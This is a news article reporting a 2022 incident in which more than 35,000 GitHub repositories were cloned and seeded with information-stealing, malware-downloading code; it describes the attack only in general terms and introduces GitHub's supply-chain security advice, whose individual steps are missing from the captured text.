Github Supply Chain Attack Could Affect 83 Million Developers | Cyber Security Hub – Cyber Security Hub

GitHub supply chain attack could affect 83 million developers | Cyber Security Hub – Cyber Security Hub

GitHub, a code repository which is used by more than 83 million developers across the globe, has been the victim of a supply chain attack.
I am uncovering what seems to be a massive widespread malware attack on @GitHub.

– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs

The attack was discovered on the morning of 3 August by software developer Stephen Lacy and involved a bad actor cloning and adding malicious code to more than 35,000 GitHub repositories, while keeping the code’s original source code. Almost 40 percent (13,000) of the repositories affected originated from a single organization, referred to as “redhat-operator-ecosystem” on the site, a spoof of RedHat openshift ecosystem.
Additionally, the cloned projects attempted to encourage users to click on them by spoofing genuine user accounts, using names that were very similar to the original projects they were clones of and using legitimate-sounding organization names. 
The malicious code allowed the repositories to collect information on the environment they were executed in, for example, identify information on the device it was executed on and the user that executed it, as well as the potential to collect other sensitive data.
The code could also download additional malware from a third-party site that allowed it to further exploit any application or environment that was using the malicious cloned code originally introduced to the GitHub repositories.
The weaponized code could lead to developers accidentally downloading cloned code repositories which contain the malicious code. If used in their applications, this would then lead them to exposing their users to code which includes malware. 
The attack was reported to GitHub by Lacy, who, according to Lacy, “cleaned up” the attack and stopped it spreading further by removing the affected projects and organizations.
GitHub allows developers to store, track and control source code within the repository. It also allows for collaborative efforts between developers, meaning developers on GitHub are able to contribute to code deposited on the site by other members. Any changes, however, are controlled by the owner of the original code, who has full visibility on any changes made, and can choose to accept or reject any changes.
Members of the site can, and frequently do, download code stored on GitHub for use in their own projects or applications. Developers can also use GitHub’s clone function to make an exact copy of a developer’s code. This does not affect the original version of the code and allows the developer who uploaded it to retain its existing statistics (for example, views, contributions and follows). The cloned code has none of these statistics and essentially becomes new code. Developers often clone code if they wish to make significant changes to code created by another developer.  
GitHub has provided advice for securing the code supply chain on its website. The advice contains three steps:
By securing their accounts, developers make it harder for bad actors to access their original source code. GitHub suggests doing the following:
By securing the code on the supply chain, developers can mitigate the risk that the code they are using to build their project is exposed to. GitHub advises that developers:
By securing the build system, developers can protect against attacks that target their system without  exploiting vulnerabilities in the system like dependencies or gaining access to accounts. GitHub recommends safeguarding against these attacks by:
24 August, 2022
25 August, 2022
August 30, 2022
Free CS Hub Online Event
September 07 – 08, 2022
Free CS Hub Online Event
14 September, 2022
September 18 – 20, 2022
Dallas, TX
Insights from the world’s foremost thought leaders delivered to your inbox.
10:00 AM – 11:00 AM SGT
10:00 AM – 11:00 AM BST
11:00 AM – 12:00 PM SGT
Reach Cyber Security professionals through cost-effective marketing opportunities to deliver your message, position yourself as a thought leader, and introduce new products, techniques and strategies to the market.
Join CSHUB today and interact with a vibrant network of professionals, keeping up to date with the industry by accessing our wealth of articles, videos, live conferences and more.
Cyber Security Hub, a division of IQPC

Careers With IQPC| Contact Us | About Us | Cookie Policy
Become a Member today!

We respect your privacy, by clicking ‘Subscribe’ you will receive our e-newsletter, including information on Podcasts, Webinars, event discounts, online learning opportunities and agree to our User Agreement. You have the right to object. For further information on how we process and monitor your personal data click here. You can unsubscribe at any time.


Leave a Comment

Leave a Reply

Your email address will not be published.

Industry suffers from 'lack of proper education' around cyber security – ifa

House Bill to Strengthen U.S. Government's Defense Against Cybersecurity Risks – Executive Gov

eSecurity Planet's 2022 Cybersecurity Product Awards | eSecurityPlanet – eSecurity Planet

Carvana Deadline Alert – Carvana (NYSE:CVNA) – Benzinga